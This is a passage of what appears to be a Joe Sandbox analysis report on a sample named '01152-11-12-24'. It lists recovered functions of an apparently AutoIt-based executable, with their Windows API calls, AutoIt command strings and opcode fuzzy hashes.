                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  • String ID:
                                                                  • API String ID: 3192549508-0
                                                                  • Opcode ID: 19cfdc59cd66add5c127d58297599a72ac26a3ea1d9ba4abf63abc1a9b75a5d9
                                                                  • Instruction ID: 8321f630e1b1e3795cba71e68c3e5272a3ca9eb4e0f06c051954bed0dce0b96c
                                                                  • Opcode Fuzzy Hash: 19cfdc59cd66add5c127d58297599a72ac26a3ea1d9ba4abf63abc1a9b75a5d9
                                                                  • Instruction Fuzzy Hash: F0B09232068208ABCA006B91EC19B883F68EB44BEAF404020F60D94060CB625490AA91
                                                                  Function 0091F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d53b05c1dc35ba510cc6ca975293b41561a5ca916c52097207cdb5c5a8b570d7
                                                                  • Instruction ID: fb454ab4f1a905a3516f3435399c4d52bc3defcdd13266003b748f771b0fc2c6
                                                                  • Opcode Fuzzy Hash: d53b05c1dc35ba510cc6ca975293b41561a5ca916c52097207cdb5c5a8b570d7
                                                                  • Instruction Fuzzy Hash: 0132D631E29F094DD7239634D8723759249AFB73D4F25D737E82AB5AA6EB28C4C35200
                                                                  Function 0092242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 046fdac888eef55d2be4a24c500e83af334be2d6c806c74e9d1e9bf14996f7ef
                                                                  • Instruction ID: c00d4722332df9750bb7c3ad7c9ff01c53ff2485967ab065563e434bd4039c5e
                                                                  • Opcode Fuzzy Hash: 046fdac888eef55d2be4a24c500e83af334be2d6c806c74e9d1e9bf14996f7ef
                                                                  • Instruction Fuzzy Hash: E9B1ED30E3AF514DE72396399831336BA5CAFBB2C5B51D71BFC2670E26EB2185835241
                                                                  Function 00958889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __time64.LIBCMT ref: 0095889B
                                                                    • Part of subcall function 0091520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00958F6E,00000000,?,?,?,?,0095911F,00000000,?), ref: 00915213
                                                                    • Part of subcall function 0091520A: __aulldiv.LIBCMT ref: 00915233
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Time$FileSystem__aulldiv__time64
                                                                  • String ID:
                                                                  • API String ID: 2893107130-0
                                                                  • Opcode ID: 6562f12dfa882d0236b290b0231366dedf365962c3c66c52b8e80d549eae9b0d
                                                                  • Instruction ID: 1d37e5393ae54c3304fee68dbc92181a1fe58a5d1929554241cd3c1314dd40ee
                                                                  • Opcode Fuzzy Hash: 6562f12dfa882d0236b290b0231366dedf365962c3c66c52b8e80d549eae9b0d
                                                                  • Instruction Fuzzy Hash: 2F21E432635610CBC329CF29D841A52B3E5EFA4321B288F2CE5F5CB2C0CA74B905DB54
                                                                  Function 00954C27 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00954C4A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: mouse_event
                                                                  • String ID:
                                                                  • API String ID: 2434400541-0
                                                                  • Opcode ID: feadabc40c143ffdc1cefe0095fd2687c340106a4cfc5a1be8d5ee9bdf505023
                                                                  • Instruction ID: 32c651264767c93708dc2ad965f4569c6e3d6bf2caaf382faf43e24b2e878862
                                                                  • Opcode Fuzzy Hash: feadabc40c143ffdc1cefe0095fd2687c340106a4cfc5a1be8d5ee9bdf505023
                                                                  • Instruction Fuzzy Hash: DAD017A116520928E89CC722DA1FFBA1108E38078BFD08549B9828A0C1A8849CC86630
                                                                  Function 009487B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00948389), ref: 009487D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: LogonUser
                                                                  • String ID:
                                                                  • API String ID: 1244722697-0
                                                                  • Opcode ID: cc4a8b4acc5f65de3ba34be3c76e7aac2d1ddda239f2b25284662c0e38783a30
                                                                  • Instruction ID: eef72eb5b101a8e07fe8ee1269314bb5d3c7834cac4c491fbd5bc3d49e8f8a99
                                                                  • Opcode Fuzzy Hash: cc4a8b4acc5f65de3ba34be3c76e7aac2d1ddda239f2b25284662c0e38783a30
                                                                  • Instruction Fuzzy Hash: A4D05E3326450EABEF018EA4DC01EAE3B69EB04B01F408111FE15D61A1C775D835AB60
                                                                  Function 0091A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0091A12A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  • String ID:
                                                                  • API String ID: 3192549508-0
                                                                  • Opcode ID: bdb959f8cc0dbc583ef048c8521607b5ac2be44bf468acfea6b378c9b7cf9898
                                                                  • Instruction ID: 9806aefb819eda8ee0682668fad65160414621140c47b7ae635ebe44f484a30c
                                                                  • Opcode Fuzzy Hash: bdb959f8cc0dbc583ef048c8521607b5ac2be44bf468acfea6b378c9b7cf9898
                                                                  • Instruction Fuzzy Hash: E6A0123101410CA78A001B41EC044447F5CD7002D47004020F40C40021873254505980
                                                                  Function 00908808 Relevance: .6, Instructions: 590COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e0c95242f5b7258f264e748068498fe71f51fc34266003e345718e4fbf0b3991
                                                                  • Instruction ID: b10a4f557e285d8e0f9fbbc884f42da61ccaabbefc32b7df48fab21c6150b264
                                                                  • Opcode Fuzzy Hash: e0c95242f5b7258f264e748068498fe71f51fc34266003e345718e4fbf0b3991
                                                                  • Instruction Fuzzy Hash: 54223330708516CFCF28CA64C494B7E77E9BF41304F29886BD9E68A9D3DB749D91CA41
                                                                  Function 009121C5 Relevance: .3, Instructions: 345COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                  • Instruction ID: a40f465e321dfb4eb57a748344b59bb083d5246524fac52ec6b14d601ee59e91
                                                                  • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                  • Instruction Fuzzy Hash: 5CC1E6363090970ADF2D573994750BEFBA55EA27B131A076EE4B3CB0D4EE20C9B5D620
                                                                  Function 009125FA Relevance: .3, Instructions: 341COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                  • Instruction ID: 3273b54ae95899ed11794db1aedcfb8658509f3fc364a64fc2aa2c32d3ed575d
                                                                  • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                  • Instruction Fuzzy Hash: 92C1B2363051970ADF2D573AD4350BEBAA55FA27B131A07AED4B3DB0D4EE20C9B4D620
                                                                  Function 00911D90 Relevance: .3, Instructions: 331COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                  • Instruction ID: fc1b414edabf9788249f0d69851cae68e945896ce10a58af5a8c25c61fa77b9b
                                                                  • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                  • Instruction Fuzzy Hash: D2C1C6363090971ADF2D463AD4350BEFBA55EA27B131A076ED9B3CB1C4EE10C9B5D620
                                                                  Function 00911978 Relevance: .3, Instructions: 323COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                  • Instruction ID: 74fad753d93943cf93b4d501db346dd4f298f16a99e7e15aafd772234c718277
                                                                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                  • Instruction Fuzzy Hash: 2FC1C23630909719DF2D463AE4351BEFBA55EA27B131A076ED5B3CB1C4EE20C9A4C660
                                                                  Function 01416470 Relevance: .1, Instructions: 92COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1285208597.0000000001412000.00000040.00000020.00020000.00000000.sdmp, Offset: 01412000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1412000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                  • Instruction ID: 466b204657dab7ec59a33c378ffd6d5fa96b5ebf9c6a46bca71fcc0afb93136f
                                                                  • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                  • Instruction Fuzzy Hash: DD41D371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB40
                                                                  Function 01416360 Relevance: .0, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1285208597.0000000001412000.00000040.00000020.00020000.00000000.sdmp, Offset: 01412000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1412000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                  • Instruction ID: deae007e37ab5aae100be641e2be2ede0cf07fa5ea4e56df959c46cbb9e05f7f
                                                                  • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                  • Instruction Fuzzy Hash: 52019278A00209EFCB44DF99C5909AEF7B5FB88310F20869AD809A7315D730EE42DB80
                                                                  Function 01416300 Relevance: .0, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1285208597.0000000001412000.00000040.00000020.00020000.00000000.sdmp, Offset: 01412000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1412000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                  • Instruction ID: e34b33c8cc352c5d64560743c192be1d07111dc9ba5aabf926800132f011fa5c
                                                                  • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                  • Instruction Fuzzy Hash: 65019278A00209EFCB44DF98C5909AEF7B5FB48310F20859ADC19A7315E730EE42DB80
                                                                  Function 01414CD0 Relevance: .0, Instructions: 6COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1285208597.0000000001412000.00000040.00000020.00020000.00000000.sdmp, Offset: 01412000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1412000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                  • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                  • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                  • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                  Function 00967806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DeleteObject.GDI32(00000000), ref: 0096785B
                                                                  • DeleteObject.GDI32(00000000), ref: 0096786D
                                                                  • DestroyWindow.USER32 ref: 0096787B
                                                                  • GetDesktopWindow.USER32 ref: 00967895
                                                                  • GetWindowRect.USER32(00000000), ref: 0096789C
                                                                  • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 009679DD
                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 009679ED
                                                                  • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00967A35
                                                                  • GetClientRect.USER32(00000000,?), ref: 00967A41
                                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00967A7B
                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00967A9D
                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00967AB0
                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00967ABB
                                                                  • GlobalLock.KERNEL32(00000000), ref: 00967AC4
                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00967AD3
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00967ADC
                                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00967AE3
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00967AEE
                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00967B00
                                                                  • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00982CAC,00000000), ref: 00967B16
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00967B26
                                                                  • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00967B4C
                                                                  • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00967B6B
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00967B8D
                                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00967D7A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                  • API String ID: 2211948467-2373415609
                                                                  • Opcode ID: 398feb0d9a23432a5d2d423488dff9656fdee1fedfcb3fee89f533cab041beb3
                                                                  • Instruction ID: a8de3b97b0e43bbdf4b7671c5bd84f42de4b65d2809eb6cad3ba7bb445e7865a
                                                                  • Opcode Fuzzy Hash: 398feb0d9a23432a5d2d423488dff9656fdee1fedfcb3fee89f533cab041beb3
                                                                  • Instruction Fuzzy Hash: 0E029E72914119EFDB14DFA8CD99EAEBBB9FF48314F008158F919AB2A1C7309D41DB60
                                                                  Function 0097356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CharUpperBuffW.USER32(?,?,0097F910), ref: 00973627
                                                                  • IsWindowVisible.USER32(?), ref: 0097364B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharUpperVisibleWindow
                                                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                  • API String ID: 4105515805-45149045
                                                                  • Opcode ID: e7ed170ddb929ff7955cb21726121c63f901517e0c8847cd1967fe8fca4b1e4b
                                                                  • Instruction ID: 571e59723d9020b753023dff06dbba5c4218ff59f7107e2d4867d9f427f9480f
                                                                  • Opcode Fuzzy Hash: e7ed170ddb929ff7955cb21726121c63f901517e0c8847cd1967fe8fca4b1e4b
                                                                  • Instruction Fuzzy Hash: 3BD192312143059BCB14EF14C556FAE7BE5BF85344F14C858F8899B2A2DB31DE49DB82
                                                                  Function 0097A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetTextColor.GDI32(?,00000000), ref: 0097A630
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 0097A661
                                                                  • GetSysColor.USER32(0000000F), ref: 0097A66D
                                                                  • SetBkColor.GDI32(?,000000FF), ref: 0097A687
                                                                  • SelectObject.GDI32(?,00000000), ref: 0097A696
                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 0097A6C1
                                                                  • GetSysColor.USER32(00000010), ref: 0097A6C9
                                                                  • CreateSolidBrush.GDI32(00000000), ref: 0097A6D0
                                                                  • FrameRect.USER32(?,?,00000000), ref: 0097A6DF
                                                                  • DeleteObject.GDI32(00000000), ref: 0097A6E6
                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 0097A731
                                                                  • FillRect.USER32(?,?,00000000), ref: 0097A763
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0097A78E
                                                                    • Part of subcall function 0097A8CA: GetSysColor.USER32(00000012), ref: 0097A903
